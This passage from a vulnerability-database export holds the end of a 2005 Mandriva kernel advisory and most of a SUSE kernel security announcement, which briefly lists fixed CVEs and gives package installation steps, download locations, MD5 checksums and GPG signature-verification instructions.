x86_64/corporate/3.0/RPMS/kernel-2.6.3.29mdk-1-1mdk.x86_64.rpm\r\n 3cb631841cf4e9d29e1f667d940d9ab4 x86_64/corporate/3.0/RPMS/kernel-secure-2.6.3.29mdk-1-1mdk.x86_64.rpm\r\n 61024ad1c23dbde624c3cd43c8805f26 x86_64/corporate/3.0/RPMS/kernel-smp-2.6.3.29mdk-1-1mdk.x86_64.rpm\r\n ba1514dcafcc748796bd9b23cd1905e4 x86_64/corporate/3.0/RPMS/kernel-source-2.6.3-29mdk.x86_64.rpm\r\n 48a9eb1de36653665e6d7de333d25cb0 x86_64/corporate/3.0/RPMS/kernel-source-stripped-2.6.3-29mdk.x86_64.rpm\r\n b2497e007272f38b30e98b4231a77a76 x86_64/corporate/3.0/SRPMS/kernel-2.6.3.29mdk-1-1mdk.src.rpm\r\n\r\n Multi Network Firewall 2.0:\r\n 7e38bcdc8a3900485d17d08e13963700 mnf/2.0/RPMS/kernel-2.6.3.29mdk-1-1mdk.i586.rpm\r\n 9acc6e90b1a8620be6af552baa8524ab mnf/2.0/RPMS/kernel-i686-up-4GB-2.6.3.29mdk-1-1mdk.i586.rpm\r\n 1a171d91312764089f2f0c84a6e9131a mnf/2.0/RPMS/kernel-p3-smp-64GB-2.6.3.29mdk-1-1mdk.i586.rpm\r\n e6f42b56669ca4ac5515d728051c4f88 mnf/2.0/RPMS/kernel-secure-2.6.3.29mdk-1-1mdk.i586.rpm\r\n 5f3e473fae7614433328756156f2b953 mnf/2.0/RPMS/kernel-smp-2.6.3.29mdk-1-1mdk.i586.rpm\r\n b2497e007272f38b30e98b4231a77a76 mnf/2.0/SRPMS/kernel-2.6.3.29mdk-1-1mdk.src.rpm\r\n _______________________________________________________________________\r\n\r\n To upgrade automatically use MandrivaUpdate or urpmi. The verification\r\n of md5 checksums and GPG signatures is performed automatically for you.\r\n\r\n All packages are signed by Mandriva for security. You can obtain the\r\n GPG public key of the Mandriva Security Team by executing:\r\n\r\n gpg --recv-keys --keyserver pgp.mit.edu 0x22458A98\r\n\r\n You can view other update advisories for Mandriva Linux at:\r\n\r\n http://www.mandriva.com/security/advisories\r\n\r\n If you want to report vulnerabilities, please contact\r\n\r\n security_(at)_mandriva.com\r\n _______________________________________________________________________\r\n\r\n Type Bits/KeyID Date User ID\r\n pub 1024D/22458A98 2000-07-10 Mandriva Security Team\r\n <security*mandriva.com>\r\n-----BEGIN PGP SIGNATURE-----\r\nVersion: GnuPG v1.2.4 (GNU/Linux)\r\n\r\niD8DBQFDjfSCmqjQ0CJFipgRAivNAKCf9uIkAEZu5hRDk/tDe6Y89813zQCdEqFD\r\nAr/Lnzyy9a037hb4fBSiHsc=\r\n=Ohmy\r\n-----END PGP SIGNATURE-----", "edition": 1, "modified": "2005-12-01T00:00:00", "published": "2005-12-01T00:00:00", "id": "SECURITYVULNS:DOC:10474", "href": "https://vulners.com/securityvulns/SECURITYVULNS:DOC:10474", "title": "MDKSA-2005:218 - Updated kernel packages fix numerous vulnerabilities", "type": "securityvulns", "cvss": {"score": 7.1, "vector": "AV:NETWORK/AC:MEDIUM/Au:NONE/C:NONE/I:NONE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:10:13", "bulletinFamily": "software", "cvelist": ["CVE-2005-2457", "CVE-2005-0916", "CVE-2005-1765", "CVE-2005-2459", "CVE-2005-2456", "CVE-2005-2458", "CVE-2005-2555"], "description": "-----BEGIN PGP SIGNED MESSAGE-----\r\nHash: SHA1\r\n\r\n________________________________________________________________________\r\n______\r\n\r\nSUSE Security Announcement\r\n\r\nPackage: kernel\r\nAnnouncement ID: SUSE-SA:2005:050\r\nDate: Thu, 01 Sep 2005 14:00:00 +0000\r\nAffected Products: 9.1, 9.2, 9.3\r\nSUSE Linux Enterprise Server 9\r\nNovell Linux Desktop 9\r\nVulnerability Type: denial of service, local privilege escalation\r\nSeverity (1-10): 7\r\nSUSE Default Package: yes\r\nCross-References: CAN-2005-2457\r\nCAN-2005-2458\r\nCAN-2005-2459\r\nCAN-2005-2555\r\nCAN-2005-2456\r\nCAN-2005-0916\r\n\r\nContent of This Advisory:\r\n1) Security Vulnerability Resolved:\r\nvarious security issues and bugfixes for the Linux kernel\r\nProblem Description\r\n2) Solution or Workaround\r\n3) Special Instructions and Notes\r\n4) Package Location and Checksums\r\n5) Pending Vulnerabilities, Solutions, and Workarounds:\r\nSee SUSE Security Summary Report.\r\n6) Authenticity Verification and Additional Information\r\n\r\n________________________________________________________________________\r\n______\r\n\r\n1) Problem Description and Brief Discussion\r\n\r\nThe Linux kernel was updated to fix the following security issues:\r\n- CAN-2005-2457: A problem in decompression of files on "zisofs"\r\nfilesystem was fixed.\r\n\r\n- CAN-2005-2458: A potential buffer overflow in the zlib decompression\r\nhandling in the kernel was fixed.\r\n\r\n- CAN-2005-2459: Some return codes in zlib decoding were fixed which\r\ncould have led to an attacker crashing the kernel.\r\n\r\n- CAN-2005-2555: Only processes with the CAP_NET_ADMIN capability is\r\nnow allowed load socket policies.\r\n\r\n- CAN-2005-2456: Fixed a potential overflow caused by missing boundary\r\nchecks of sock->sk_policy in net/xfrm/.\r\n\r\n- AMD64/EM64T/x86_64 only: A previous fix for a denial of service\r\nattack with compat 32bit mode programs was too strict and could\r\ncrash the kernel. (The earlier fix had the Mitre CVE ID CAN-2005-1765.)\r\n\r\n- S/390 only: Fixed /sys/ permissions where a user could change machine\r\nstates, including powering down or up partitions.\r\n\r\n- CAN-2005-0916: PowerPC only: A missing patch for a hugetlb memory\r\ncontext handling problem was added.\r\n\r\nAbove problems affect SUSE Linux 9.1 up to 9.3 and SUSE Linux\r\nEnterprise Server 9.\r\n\r\nAdditionally following bugs were fixed for SUSE Linux Enterprise\r\nServer 9 and SUSE Linux 9.1:\r\n- The reported process start times sometimes were incorrect.\r\n- The OCFS2 filesystem was updated to version 1.0.2. (SLES 9 only)\r\n- A potential deadlock in cpuset handling was fixed.\r\n- Fixed a potential crash on startup of the tg3 network driver.\r\n- Avoid high IRQ latencies in the VM handling.\r\n- rpm/post.sh was fixed so that initrd.previous is preserved again.\r\n- A problem in the handling of the tape ioctl MTIOCPOS was fixed.\r\n- Make the OOM process killer send SIGTERM first instead of SIGKILL.\r\n- Fixed a netfilter connection track return code mismatch.\r\n- Fixed a typo in the ipt_TTL netfilter module.\r\n- XEN was updated to version 2.0.6b. (i386 only)\r\n- Allow rsize/wsize values less than 4096 for NFS mounts.\r\n- A data corruption problem within the reiserfs filesystem in\r\nthe handling of writing to mmaped regions after close of the file\r\ndescriptor was fixed.\r\n\r\n2) Solution or Workaround\r\n\r\nThere is no known workaround, please install the update packages.\r\n\r\n3) Special Instructions and Notes\r\n\r\nSPECIAL INSTALLATION INSTRUCTIONS\r\n=================================\r\nThe following paragraphs guide you through the installation\r\nprocess in a step-by-step fashion. The character sequence "****"\r\nmarks the beginning of a new paragraph. In some cases, the steps\r\noutlined in a particular paragraph may or may not be applicable\r\nto your situation. Therefore, make sure that you read through\r\nall of the steps below before attempting any of these\r\nprocedures. All of the commands that need to be executed must be\r\nrun as the superuser 'root'. Each step relies on the steps\r\nbefore it to complete successfully.\r\n\r\n**** Step 1: Determine the needed kernel type.\r\n\r\nUse the following command to determine which kind of kernel is\r\ninstalled on your system:\r\n\r\nrpm -qf --qf '%{name}\n' /boot/vmlinuz\r\n\r\n**** Step 2: Download the packages for your system.\r\n\r\nDownload the kernel RPM package for your distribution with the\r\nname indicated by Step 1. Starting from SUSE LINUX 9.2, kernel\r\nmodules that are not free were moved to a separate package with\r\nthe suffix '-nongpl' in its name. Download that package as well\r\nif you rely on hardware that requires non-free drivers, such as\r\nsome ISDN adapters. The list of all kernel RPM packages is\r\nappended below.\r\n\r\nThe kernel-source package does not contain a binary kernel in\r\nbootable form. Instead, it contains the sources that correspond\r\nwith the binary kernel RPM packages. This package is required to\r\nbuild third party add-on modules.\r\n\r\n**** Step 3: Verify authenticity of the packages.\r\n\r\nVerify the authenticity of the kernel RPM package using the\r\nmethods as listed in Section 6 of this SUSE Security\r\nAnnouncement.\r\n\r\n**** Step 4: Installing your kernel rpm package.\r\n\r\nInstall the rpm package that you have downloaded in Step 2 with\r\nthe command\r\n\r\nrpm -Uhv <FILE>\r\n\r\nreplacing <FILE> with the filename of the RPM package\r\ndownloaded.\r\n\r\nWarning: After performing this step, your system may not boot\r\nunless the following steps have been followed\r\ncompletely.\r\n\r\n**** Step 5: Configuring and creating the initrd.\r\n\r\nThe initrd is a RAM disk that is loaded into the memory of your\r\nsystem together with the kernel boot image by the boot loader.\r\nThe kernel uses the content of this RAM disk to execute commands\r\nthat must be run before the kernel can mount its root file\r\nsystem. The initrd is typically used to load hard disk\r\ncontroller drivers and file system modules. The variable\r\nINITRD_MODULES in /etc/sysconfig/kernel determines which kernel\r\nmodules are loaded in the initrd.\r\n\r\nAfter a new kernel rpm has been installed, the initrd must be\r\nrecreated to include the updated kernel modules. Usually this\r\nhappens automatically when installing the kernel rpm. If\r\ncreating the initrd fails for some reason, manually run the\r\ncommand\r\n\r\n/sbin/mkinitrd\r\n\r\n**** Step 6: Update the boot loader, if necessary.\r\n\r\nDepending on your software configuration, you either have the\r\nLILO or GRUB boot loader installed and initialized on your\r\nsystem. Use the command\r\n\r\ngrep LOADER_TYPE /etc/sysconfig/bootloader\r\n\r\nto find out which boot loader is configured.\r\n\r\nThe GRUB boot loader does not require any further action after a\r\nnew kernel has been installed. You may proceed to the next step\r\nif you are using GRUB.\r\n\r\nIf you use the LILO boot loader, lilo must be run to\r\nreinitialize the boot sector of the hard disk. Usually this\r\nhappens automatically when installing the kernel RPM. In case\r\nthis step fails, run the command\r\n\r\n/sbin/lilo\r\n\r\nWarning: An improperly installed boot loader will render your\r\nsystem unbootable.\r\n\r\n**** Step 7: Reboot.\r\n\r\nIf all of the steps above have been successfully completed on\r\nyour system, the new kernel including the kernel modules and the\r\ninitrd are ready to boot. The system needs to be rebooted for\r\nthe changes to be active. Make sure that all steps have been\r\ncompleted then reboot using the command\r\n\r\n/sbin/shutdown -r now\r\n\r\nYour system will now shut down and restart with the new kernel.\r\n\r\n4) Package Location and Checksums\r\n\r\nThe preferred method for installing security updates is to use the YaST\r\nOnline Update (YOU) tool. YOU detects which updates are required and\r\nautomatically performs the necessary steps to verify and install them.\r\nAlternatively, download the update packages for your distribution manually\r\nand verify their integrity by the methods listed in Section 6 of this\r\nannouncement. Then install the packages using the command\r\n\r\nrpm -Fhv <file.rpm>\r\n\r\nto apply the update, replacing <file.rpm> with the filename of the\r\ndownloaded RPM package.\r\n\r\nOur maintenance customers are notified individually. The packages are\r\noffered for installation from the maintenance web.\r\n\r\nx86 Platform:\r\n\r\nSUSE Linux 9.3:\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/Intel-536ep-4.69-10\r\n.3.i586.rpm\r\n109dae42886f2911ecd8cc4af99c3b2c\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/dprobes-3.6.5-8.3.i\r\n586.rpm\r\nbfeb0c950feeaa75c79a4a57cc87f551\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-bigsmp-2.6.1\r\n1.4-21.9.i586.rpm\r\n7e7ba551fe6b92107a0ba09826d8e120\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-bigsmp-nongp\r\nl-2.6.11.4-21.9.i586.rpm\r\na93a42d93d0afa839e8884ca9ac42c99\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-default-2.6.\r\n11.4-21.9.i586.rpm\r\n2d8a2dc424c11b5da3949de154c4b80c\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-default-nong\r\npl-2.6.11.4-21.9.i586.rpm\r\n6f7a4b0a62ced6586aa7353ed748c90c\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-smp-2.6.11.4\r\n-21.9.i586.rpm\r\n750dea25641d0ad7d773159d47ca4e73\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-smp-nongpl-2\r\n.6.11.4-21.9.i586.rpm\r\nee34377746c4b71d6d7afc7534571ca8\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-source-2.6.1\r\n1.4-21.9.i586.rpm\r\n3239a4c642281f183de39665146066f4\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-syms-2.6.11.\r\n4-21.9.i586.rpm\r\n963b94068f885e168a66827d69800671\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-um-2.6.11.4-\r\n21.9.i586.rpm\r\nceee524474d29063a2d822c72c0b1f51\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-um-nongpl-2.\r\n6.11.4-21.9.i586.rpm\r\n52740f234d74c21a0e5623187bf26936\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-xen-2.6.11.4\r\n-21.9.i586.rpm\r\na4c2cf202304fcf52ce85cb7dcc61d4f\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/kernel-xen-nongpl-2\r\n.6.11.4-21.9.i586.rpm\r\nf8ef60057bc59af1547652b1c4602341\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/ltmodem-8.31a10-7.3\r\n.i586.rpm\r\n3bc9843472d9ed2441ba86e9b8b9ce32\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/um-host-install-ini\r\ntrd-1.0-50.3.i586.rpm\r\ne539dfe0c114e43074c2cf28941b6370\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/i586/um-host-kernel-2.6.\r\n11.4-21.9.i586.rpm\r\n41feebd67d6f7423cbba6237225f5f5c\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/noarch/kernel-docs-2.6.1\r\n1.4-21.9.noarch.rpm\r\n6b30319984cb6de2077d45f315df61c1\r\n\r\nSUSE Linux 9.2:\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/Intel-536ep-4.69-5.\r\n11.i586.rpm\r\nb9770aab503fa879cd55f4de3ce048f0\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-bigsmp-2.6.8\r\n-24.18.i586.rpm\r\nf2d18f3a10c1e2dbea9ea504ab6b9ff4\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-bigsmp-nongp\r\nl-2.6.8-24.18.i586.rpm\r\n868363c524a6aa6b0e2557459cf63a64\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-default-2.6.\r\n8-24.18.i586.rpm\r\n3621a8e1ec926d6da0a274e1f23a3ea1\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-default-nong\r\npl-2.6.8-24.18.i586.rpm\r\nf11a56495ff83f34dc1fb38305415f54\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-smp-2.6.8-24\r\n.18.i586.rpm\r\nbf5e230555f840dd9eb8911198cbc371\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-smp-nongpl-2\r\n.6.8-24.18.i586.rpm\r\n5ee7ee747863bade5b1dce5dbf9c7e15\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-source-2.6.8\r\n-24.18.i586.rpm\r\n6917011ebed217407e11a01ffc7bf626\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-syms-2.6.8-2\r\n4.18.i586.rpm\r\n0dc29fb67711452cdbe5559c0cfde5fb\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-um-2.6.8-24.\r\n18.i586.rpm\r\n3003c431b7e9a42bebbf784af93a3f76\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/kernel-um-nongpl-2.\r\n6.8-24.18.i586.rpm\r\n09f993e9d0cd44e35cfc413ba7e78bf2\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/ltmodem-8.31a8-6.11\r\n.i586.rpm\r\nfe37f4b03e17a6744186109e392a55a0\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/um-host-install-ini\r\ntrd-1.0-48.10.i586.rpm\r\nbd22da540dc368149a2c9be16d8003c7\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/i586/um-host-kernel-2.6.\r\n8-24.18.i586.rpm\r\nde3787a34b56330cdd0adc94dc1d6006\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/noarch/kernel-docs-2.6.8\r\n-24.18.noarch.rpm\r\n1f21b6b38e708a5dc1aefce5625422a9\r\n\r\nSUSE Linux 9.1:\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-bigsmp-2.6.5\r\n-7.201.i586.rpm\r\naa45d2173b5566458c3f0f3398cc0f3d\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-default-2.6.\r\n5-7.201.i586.rpm\r\n63eeab850bdfa1a4305e28539320623b\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-smp-2.6.5-7.\r\n201.i586.rpm\r\n0a676bfc456c2313cfa5494a2e7c6b27\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-source-2.6.5\r\n-7.201.i586.rpm\r\n9d3f2c8f10d6d5003a8ea7092db297d3\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/kernel-syms-2.6.5-7\r\n.201.i586.rpm\r\n26a74b8ddedef7338925436ba003c8c4\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/i586/ltmodem-2.6.2-38.18\r\n.i586.rpm\r\ndcf21f7128d4706d2da312f9a6b8dc90\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/noarch/kernel-docs-2.6.5\r\n-7.201.noarch.rpm\r\ncab23dd81c314831b410b54c0dfbc42a\r\nsource rpm(s):\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-bigsmp-2.6.5-\r\n7.201.nosrc.rpm\r\n4ba7837432933e6596c96ee60dda1234\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-default-2.6.5\r\n-7.201.nosrc.rpm\r\nb05d0775cc2af4b0e3dba0526be965d2\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-docs-2.6.5-7.\r\n201.src.rpm\r\n73f3e4ed493276c33cd4053651d799a1\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-smp-2.6.5-7.2\r\n01.nosrc.rpm\r\nfcb5dcbdb2488a76bae06adb4ea78dee\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-source-2.6.5-\r\n7.201.src.rpm\r\n1553435ba0f6daaeccc63f10a29fa45c\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/kernel-syms-2.6.5-7.\r\n201.src.rpm\r\n60be37a607d8026f610fc9b8c1e9ae17\r\nftp://ftp.suse.com/pub/suse/i386/update/9.1/rpm/src/ltmodem-2.6.2-38.18.\r\nsrc.rpm\r\n6e1255189986a535415ba4b4e0564520\r\n\r\nx86-64 Platform:\r\n\r\nSUSE Linux 9.3:\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kernel-default-2.\r\n6.11.4-21.9.x86_64.rpm\r\n4d70cd8cb28769225df3dee3ee3a75b8\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kernel-default-no\r\nngpl-2.6.11.4-21.9.x86_64.rpm\r\nccbfe4e8c9a494e503e8ffac13f5c96b\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kernel-smp-2.6.11\r\n.4-21.9.x86_64.rpm\r\n728b815392936f82c1adc851ea8e29d3\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kernel-smp-nongpl\r\n-2.6.11.4-21.9.x86_64.rpm\r\n4035b4d7327357bfe0d6716436fd19e0\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kernel-source-2.6\r\n.11.4-21.9.x86_64.rpm\r\n2a786f6c08590518a18d9681dca4ad52\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/x86_64/kernel-syms-2.6.1\r\n1.4-21.9.x86_64.rpm\r\nf1746cd488a6da7a5e0a19969826550c\r\nsource rpm(s):\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/kernel-default-2.6.1\r\n1.4-21.9.nosrc.rpm\r\naa979e173bc503975cf13cbab233bfb4\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/kernel-smp-2.6.11.4-\r\n21.9.nosrc.rpm\r\n8754d80bf918690b92d831ea71488a86\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/kernel-source-2.6.11\r\n.4-21.9.src.rpm\r\n8644df179ff0d981a5fdce59e4e1fbfe\r\nftp://ftp.suse.com/pub/suse/i386/update/9.3/rpm/src/kernel-syms-2.6.11.4\r\n-21.9.src.rpm\r\n1bbb661256f769a3fae67fdd19a563fe\r\n\r\nSUSE Linux 9.2:\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kernel-default-2.\r\n6.8-24.18.x86_64.rpm\r\na8230f827e8cd61908bb11f16507edf2\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kernel-default-no\r\nngpl-2.6.8-24.18.x86_64.rpm\r\nb4e58b8b233457a1fc7155faf339ac46\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kernel-smp-2.6.8-\r\n24.18.x86_64.rpm\r\nad755caed5c5218190e3fb7d421f1e2a\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kernel-smp-nongpl\r\n-2.6.8-24.18.x86_64.rpm\r\n5bf4775c72b70883fd17273ff2999161\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kernel-source-2.6\r\n.8-24.18.x86_64.rpm\r\nb9db64d95bcae9c070597a5720fb25a2\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/x86_64/kernel-syms-2.6.8\r\n-24.18.x86_64.rpm\r\n0e65e631c2e9ba35e6d1bf1163e7a8a8\r\nsource rpm(s):\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/kernel-default-2.6.8\r\n-24.18.nosrc.rpm\r\ne4b8d7c2fdb1b9872494d069746dd90b\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/kernel-smp-2.6.8-24.\r\n18.nosrc.rpm\r\naaa890bb4ae4ae23c97f5bffcbcd2903\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/kernel-source-2.6.8-\r\n24.18.src.rpm\r\n2b05f5c1a7fbf7d71ed7b2c0ed2d0c54\r\nftp://ftp.suse.com/pub/suse/i386/update/9.2/rpm/src/kernel-syms-2.6.8-24\r\n.18.src.rpm\r\n4e4ee957d672abc004abff13e39be8a2\r\n\r\nSUSE Linux 9.1:\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/noarch/kernel-docs-2.6\r\n.5-7.201.noarch.rpm\r\n3f727ff28a5e40fd0c472fc2beacb6f7\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-default-\r\n2.6.5-7.201.x86_64.rpm\r\ne868e8d135eaa480aa65eeb4936aa9ed\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-smp-2.6.\r\n5-7.201.x86_64.rpm\r\nf0c10b5ecdeace7416a914c4f6bf9a77\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-source-2\r\n.6.5-7.201.x86_64.rpm\r\n5f058bc7b8b8e01c154e601c6802772b\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/x86_64/kernel-syms-2.6\r\n.5-7.201.x86_64.rpm\r\n8344d1a6429b502c2b6a13bae440c1a6\r\nsource rpm(s):\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-default-2.6\r\n.5-7.201.nosrc.rpm\r\nba19c499f451e49609a518c220614512\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-docs-2.6.5-\r\n7.201.src.rpm\r\n060132033a7b024f0a79131e3312cc30\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-smp-2.6.5-7\r\n.201.nosrc.rpm\r\n7c62646a0d6c8036d5cb74d9dbd071b3\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-source-2.6.\r\n5-7.201.src.rpm\r\n17cd263a0ec18dee41099c560685e928\r\nftp://ftp.suse.com/pub/suse/x86_64/update/9.1/rpm/src/kernel-syms-2.6.5-\r\n7.201.src.rpm\r\n7834c7e97de98f4611f600ec1bfdb7dc\r\n\r\n________________________________________________________________________\r\n______\r\n\r\n5) Pending Vulnerabilities, Solutions, and Workarounds:\r\n\r\nSee SUSE Security Summary Report.\r\n________________________________________________________________________\r\n______\r\n\r\n6) Authenticity Verification and Additional Information\r\n\r\n- Announcement authenticity verification:\r\n\r\nSUSE security announcements are published via mailing lists and on Web\r\nsites. The authenticity and integrity of a SUSE security announcement is\r\nguaranteed by a cryptographic signature in each announcement. All SUSE\r\nsecurity announcements are published with a valid signature.\r\n\r\nTo verify the signature of the announcement, save it as text into a file\r\nand run the command\r\n\r\ngpg --verify <file>\r\n\r\nreplacing <file> with the name of the file where you saved the\r\nannouncement. The output for a valid signature looks like:\r\n\r\ngpg: Signature made <DATE> using RSA key ID 3D25D3D9\r\ngpg: Good signature from "SuSE Security Team <security (at) suse (dot) de [email concealed]>"\r\n\r\nwhere <DATE> is replaced by the date the document was signed.\r\n\r\nIf the security team's key is not contained in your key ring, you can\r\nimport it from the first installation CD. To import the key, use the\r\ncommand\r\n\r\ngpg --import gpg-pubkey-3d25d3d9-36e12d04.asc\r\n\r\n- Package authenticity verification:\r\n\r\nSUSE update packages are available on many mirror FTP servers all over the\r\nworld. While this service is considered valuable and important to the free\r\nand open source software community, the authenticity and the integrity of\r\na package needs to be verified to ensure that it has not been tampered\r\nwith.\r\n\r\nThere are two verification methods that can be used independently from\r\neach other to prove the authenticity of a downloaded file or RPM package:\r\n\r\n1) Using the internal gpg signatures of the rpm package\r\n2) MD5 checksums as provided in this announcement\r\n\r\n1) The internal rpm package signatures provide an easy way to verify the\r\nauthenticity of an RPM package. Use the command\r\n\r\nrpm -v --checksig <file.rpm>\r\n\r\nto verify the signature of the package, replacing <file.rpm> with the\r\nfilename of the RPM package downloaded. The package is unmodified if it\r\ncontains a valid signature from build (at) suse (dot) de [email concealed] with the key ID 9C800ACA.\r\n\r\nThis key is automatically imported into the RPM database (on\r\nRPMv4-based distributions) and the gpg key ring of 'root' during\r\ninstallation. You can also find it on the first installation CD and at\r\nthe end of this announcement.\r\n\r\n2) If you need an alternative means of verification, use the md5sum\r\ncommand to verify the authenticity of the packages. Execute the command\r\n\r\nmd5sum <filename.rpm>\r\n\r\nafter you downloaded the file from a SUSE FTP server or its mirrors.\r\nThen compare the resulting md5sum with the one that is listed in the\r\nSUSE security announcement. Because the announcement containing the\r\nchecksums is cryptographically signed (by security (at) suse (dot) de [email concealed]), the\r\nchecksums show proof of the authenticity of the package if the\r\nsignature of the announcement is valid. Note that the md5 sums\r\npublished in the SUSE Security Announcements are valid for the\r\nrespective packages only. Newer versions of these packages cannot be\r\nverified.\r\n\r\n- SUSE runs two security mailing lists to which any interested party may\r\nsubscribe:\r\n\r\nsuse-security (at) suse (dot) com [email concealed]\r\n- General Linux and SUSE security discussion.\r\nAll SUSE security announcements are sent to this list.\r\nTo subscribe, send an e-mail to\r\n<suse-security-subscribe (at) suse (dot) com [email concealed]>.\r\n\r\nsuse-security-announce (at) suse (dot) com [email concealed]\r\n- SUSE's announce-only mailing list.\r\nOnly SUSE's security announcements are sent to this list.\r\nTo subscribe, send an e-mail to\r\n<suse-security-announce-subscribe (at) suse (dot) com [email concealed]>.\r\n\r\nFor general information or the frequently asked questions (FAQ),\r\nsend mail to <suse-security-info (at) suse (dot) com [email concealed]> or\r\n<suse-security-faq (at) suse (dot) com [email concealed]>.\r\n\r\n=====================================================================\r\nSUSE's security contact is <security (at) suse (dot) com [email concealed]> or <security (at) suse (dot) de [email concealed]>.\r\nThe <security (at) suse (dot) de [email concealed]> public key is listed below.\r\n=====================================================================\r\n________________________________________________________________________\r\n______\r\n\r\nThe information in this advisory may be distributed or reproduced,\r\nprovided that the advisory is not modified in any way. In particular, the\r\nclear text signature should show proof of the authenticity of the text.\r\n\r\nSUSE Linux Products GmbH provides no warranties of any kind whatsoever\r\nwith respect to the information contained in this security advisory.\r\n\r\nType Bits/KeyID Date User ID\r\npub 2048R/3D25D3D9 1999-03-06 SuSE Security Team <security (at) suse (dot) de [email concealed]>\r\npub 1024D/9C800ACA 2000-10-19 SuSE Package Signing Key <build (at) suse (dot) de [email concealed]>\r\n\r\n- -----BEGIN PGP PUBLIC KEY BLOCK-----\r\nVersion: GnuPG v1.0.6 (GNU/Linux)\r\nComment: For info see 